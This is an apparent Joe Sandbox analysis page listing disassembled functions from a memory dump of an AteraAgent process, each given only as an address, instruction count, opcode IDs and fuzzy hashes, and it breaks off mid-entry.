                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 06c93548aa6d1c7c50e507b6d8e545b0024470c245511efd83d22654f305b8c3
                                                                                                                                                                                                                                          • Instruction ID: 458b2d53a310460f5246cae4f89b09ebb37c594fc50036ce621dfe17dfc30b8e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c93548aa6d1c7c50e507b6d8e545b0024470c245511efd83d22654f305b8c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73D18A3160DB498FDB54DB58D445A75B7E1FFA6350F04427ED04EC32A2DE26E84ACB82
                                                                                                                                                                                                                                          Function 00007FFAAB58B900 Relevance: .4, Instructions: 368COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9fdaa374aaf9526e0ac54354cc932da8d57018f4b9ea85fdf7119aa28fe69524
                                                                                                                                                                                                                                          • Instruction ID: 8253bb53ca1875ba97c604618ef4a4355a116237c47395b2f616c5e533df0026
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fdaa374aaf9526e0ac54354cc932da8d57018f4b9ea85fdf7119aa28fe69524
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24B17A3160DA8A4FDB95EB38D4466B577E5FF4A350F0481FEC08EC71A3DA19A84AC780
                                                                                                                                                                                                                                          Function 00007FFAAB59C9A0 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6a4812d381b3ab899a952a7fa801ab19cf9f355a4ffe51ecde6b8505afbd348c
                                                                                                                                                                                                                                          • Instruction ID: 144b213994733b8b780a85b2bc54d8c6da8ba2f7f8bdc4a0b7fe749d548e1881
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a4812d381b3ab899a952a7fa801ab19cf9f355a4ffe51ecde6b8505afbd348c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06A1E971A1CB498FEB58DB1C984A6B977D1FF99350F04017EE04ED32A2DA25F84587C2
                                                                                                                                                                                                                                          Function 00007FFAAB593C08 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b43a82060d3735b05280ceed75be63a64ebff709c04d8cde6abf556bd22e66d8
                                                                                                                                                                                                                                          • Instruction ID: d75de58dc9dd6442411e2ee0c22fc55a6aa1d70364540541796fa5afb4fe80f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b43a82060d3735b05280ceed75be63a64ebff709c04d8cde6abf556bd22e66d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDA1033161DB4A8FEB59DB2CD481A7177E1EF56350B1446B9D08FC72A3C926F84ACB80
                                                                                                                                                                                                                                          Function 00007FFAAB5873E1 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 53662018fb10f5fdbbacf2fd706397a6d43015faa52c8b3478717eea68839544
                                                                                                                                                                                                                                          • Instruction ID: 01cbc041cec08369ea053ecf75cf2331f3c5893e0555480ff7708d8f4a711254
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53662018fb10f5fdbbacf2fd706397a6d43015faa52c8b3478717eea68839544
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB10A70D09A1D8FDB94EF58C495BBDB7B1FF5A340F5481A9D00EE72A2CA34A985CB40
                                                                                                                                                                                                                                          Function 00007FFAAB59FA39 Relevance: .3, Instructions: 308COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 43cb6a4e68b1d9b5ec8131ac919d1a17879e6873d877c015ad3e923f0e6f4c9a
                                                                                                                                                                                                                                          • Instruction ID: 5d4174a028683b3928f747a79873d0db8407281771805d585242d3fd63860c7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43cb6a4e68b1d9b5ec8131ac919d1a17879e6873d877c015ad3e923f0e6f4c9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1591E471A1DA8E8FDB95DFACC8556A977E1FF6A340B0441B6D00DC7297DA34AC068780
                                                                                                                                                                                                                                          Function 00007FFAAB58D469 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 159b3f2423d1d17e82a1ed638b3c9e2464b6ba6fa13da770902a98c22911aafa
                                                                                                                                                                                                                                          • Instruction ID: 11495d40f910c46bdb4dceff841cbcabb4bb0e556ba8122c190bf7d12c8426a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 159b3f2423d1d17e82a1ed638b3c9e2464b6ba6fa13da770902a98c22911aafa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A9173A1A18A498FEB94EBA8C8557FCFBE6FF59340F1045B9D00DD31D3DD2428468B42
                                                                                                                                                                                                                                          Function 00007FFAAB58C65D Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 32384212a26c50bff7035ff88aaebeef6d76a8b028b2c76aa8fb43c5cb42f7e6
                                                                                                                                                                                                                                          • Instruction ID: 7e29ad77b56e38cdc7b3cb865e30aa172df35621ee113a0198ced8f1b9c8f6a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32384212a26c50bff7035ff88aaebeef6d76a8b028b2c76aa8fb43c5cb42f7e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F271CF3070994A8FDBA9EB2CD459A7937D4EF5A350B1041BAE48FC72A3DD14EC4687C2
                                                                                                                                                                                                                                          Function 00007FFAAB58A015 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 61af8bb78bc0b0b033c95cf1a69fb731a760bbd65c30c7c55703b2e514a6b0fd
                                                                                                                                                                                                                                          • Instruction ID: 83d05ec63bacbeee65110a6852b8f990a3371d079598724f0f3737363654843e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61af8bb78bc0b0b033c95cf1a69fb731a760bbd65c30c7c55703b2e514a6b0fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93910AA291CF878FEB54EB28C455765B7E5FF96380F00457AD00EC7193DF28A94A8B81
                                                                                                                                                                                                                                          Function 00007FFAAB58EA20 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2ccef9aa44675a855e1ab63416ff18687786d428e7f268e42f426a69c5870fa4
                                                                                                                                                                                                                                          • Instruction ID: 3f330e231889946de0315eb89a93c0283c1d30d52181624fb844772e65fae653
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ccef9aa44675a855e1ab63416ff18687786d428e7f268e42f426a69c5870fa4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17811352A1EACB8FE3A6937C58592756FD1EF9729071841FFD08EC71E3D8145C0A8391
                                                                                                                                                                                                                                          Function 00007FFAAB584610 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: caf0bffad2b5d5dc0c80a1c8c60792cac192ceb9e26371316957f8e3ff891949
                                                                                                                                                                                                                                          • Instruction ID: f1acade95628229a5560f78dcd4841d799e1fd6fbfc9513be377c163eafc1794
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caf0bffad2b5d5dc0c80a1c8c60792cac192ceb9e26371316957f8e3ff891949
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23918171918A8E8FDB84EF68C854BEAB7F1FF59340F104275D40DD72A6DA34A846CB80
                                                                                                                                                                                                                                          Function 00007FFAAB5A02A1 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a7c10b0db9addcfdfca9e334a41fb5c9d75b41f40a08b5cd7c78a29b56e409bd
                                                                                                                                                                                                                                          • Instruction ID: 89c19f0d67f839ad6cf7ba4e866846d333cfde4b0aa91de512ecbd5c59a503d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c10b0db9addcfdfca9e334a41fb5c9d75b41f40a08b5cd7c78a29b56e409bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F613A62A2DACA8FEB95DB6C88652B93BE5EF96350F0840BFD04DD7293CD145C0683C1
                                                                                                                                                                                                                                          Function 00007FFAAB59C9D7 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d4d79c75724d3e4a2ab21b84944f92dbb8d904d20fb2f74fe462da0b8680a0c
                                                                                                                                                                                                                                          • Instruction ID: b02588b977f1057263c20e38f6d0b133bdd534b39f45306db3570957df024f51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d4d79c75724d3e4a2ab21b84944f92dbb8d904d20fb2f74fe462da0b8680a0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C811B70A1994ECFDF94EF18C884AE977E5FF69354F054276E40EE3296CA34E8458B80
                                                                                                                                                                                                                                          Function 00007FFAAB5A2CA5 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f790aa17383ec95ce1ac69ae0215b3f7874f2f9bcf4a0909929da3ab2bd61859
                                                                                                                                                                                                                                          • Instruction ID: 7d4bb5864ec63bc45c67442ad92acf55d81b94cebd7ac508a0628ec974c1b6e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f790aa17383ec95ce1ac69ae0215b3f7874f2f9bcf4a0909929da3ab2bd61859
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8061BC31A0DA0B4FE7689B2CD8565B577D5EF96350B0441BED44FC3197DD16AC4A83C0
                                                                                                                                                                                                                                          Function 00007FFAAB58D76E Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f28cc65947d4d06a6d5d0ff36866f6ff23539d790c4de7cbff77d614e9718e2
                                                                                                                                                                                                                                          • Instruction ID: f55f387a82a33750c84345487cf1a545bf65e47cf7882d27e9dd3e7622f68b8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f28cc65947d4d06a6d5d0ff36866f6ff23539d790c4de7cbff77d614e9718e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24512A6290DA8A8FE7999BAC98465B977E1EF46390F0040BAD00EC71E7DD285C468BD1
                                                                                                                                                                                                                                          Function 00007FFAAB588D32 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 306a9b6fbafe4dd4eee8520ec6304aa14eb32c121843afaee8769edad9a0d33c
                                                                                                                                                                                                                                          • Instruction ID: d437aac74a7ebc4b2197db14a8940acdd6f2e0fba45112c5c4e3d6d18a02a63a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306a9b6fbafe4dd4eee8520ec6304aa14eb32c121843afaee8769edad9a0d33c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F071C07090964D8FDB89DFA8C854BED7BF1FF5A340F0041AAD00ED72A2CA399945CB50
                                                                                                                                                                                                                                          Function 00007FFAAB5880DD Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7a4439f2a3393f7356194f277644f1b67e26f0dcd117d0e4425d51e82c2a8c7
                                                                                                                                                                                                                                          • Instruction ID: 0a20f98fa3e0c7638ec6d19048aab470b8a79f23a02d560a4586e4ca2892e8d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a4439f2a3393f7356194f277644f1b67e26f0dcd117d0e4425d51e82c2a8c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D815C70C0961E8EEB58DB68C8557FDB6B4FF55340F5041BAD00EE3292DE386985DB50
                                                                                                                                                                                                                                          Function 00007FFAAB584667 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9806866b019121677e29cab65351557164434efc80303830937e3dd7043277e9
                                                                                                                                                                                                                                          • Instruction ID: 0fe1c537b571dc0a1187b29c3f64aca1821c4d72e870c9f4de846c91c37a8ce0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9806866b019121677e29cab65351557164434efc80303830937e3dd7043277e9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73712D70914A8E8FDB84EF68C895AEDB7F1FF59300F504275D40DD7296DA34A846CB80
                                                                                                                                                                                                                                          Function 00007FFAAB593C40 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f95f26944e9e7e5f13ca20cbb3097d313203abf15fada65caa0f671b99caa871
                                                                                                                                                                                                                                          • Instruction ID: 649c9547c29fac73fdf916c73e8be477a59ac17cf59f1cadbcbc5dc5fcfb6583
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f95f26944e9e7e5f13ca20cbb3097d313203abf15fada65caa0f671b99caa871
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE513230619B0A8FE7699B1CE885A7173E4FF9A350B144679D44EC3263DA26FC9687C0
                                                                                                                                                                                                                                          Function 00007FFAAB58E648 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: af213e6426ee6b4e7ccf3f8cbc0b4f31bb8006b4be7d5d3a29a7113e24614d43
                                                                                                                                                                                                                                          • Instruction ID: 21d9011287adafcf70e2e325e0c0cac41a2e92c7a83aa4b94471c50b5e564b65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af213e6426ee6b4e7ccf3f8cbc0b4f31bb8006b4be7d5d3a29a7113e24614d43
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2515630619A4A8FE759DB6CD88597173E4FF96350718467DD04EC3263DA26F8878381
                                                                                                                                                                                                                                          Function 00007FFAAB585B6A Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2fb543e786aad1e2f7ac4daded61346e680bc699580bb07ef9a007f3590f9f12
                                                                                                                                                                                                                                          • Instruction ID: 6f706a6e4bd95dd9958fc5c642418a3c04e256584ac38761701010dec503e864
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fb543e786aad1e2f7ac4daded61346e680bc699580bb07ef9a007f3590f9f12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5061157180E7898FE782CF68C854BEA7BF5EF57340F1440EAD049C71A2CA388986CB50
                                                                                                                                                                                                                                          Function 00007FFAAB5954AD Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1b06a80db77a55ee94a33bc9e0b616c4163bcb5553cb554caeb83fcee05d1eb3
                                                                                                                                                                                                                                          • Instruction ID: 178e4bfb96939b39d89c71c5f0e1b8d5c2cb3d636ed2cb11061b3b800d581998
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b06a80db77a55ee94a33bc9e0b616c4163bcb5553cb554caeb83fcee05d1eb3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2941173170EB4B4FEB99971CB8416B937C5EB96360B44417AD40EC32A7ED16EC5683C0
                                                                                                                                                                                                                                          Function 00007FFAAB58A900 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 964ae5a367addbfd8d9e8ac4f603c66f0ae8a817301b9be97b23e8b6b29c7508
                                                                                                                                                                                                                                          • Instruction ID: 20be0beba8801ae4137ed33dab13a5684da62e4e861ee97795a00397ebfb0245
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964ae5a367addbfd8d9e8ac4f603c66f0ae8a817301b9be97b23e8b6b29c7508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA51EC4290EBC34FE35657F898121B97FA5DF57260F0841FBD04D8B1EBD808990A97E2
                                                                                                                                                                                                                                          Function 00007FFAAB58C658 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
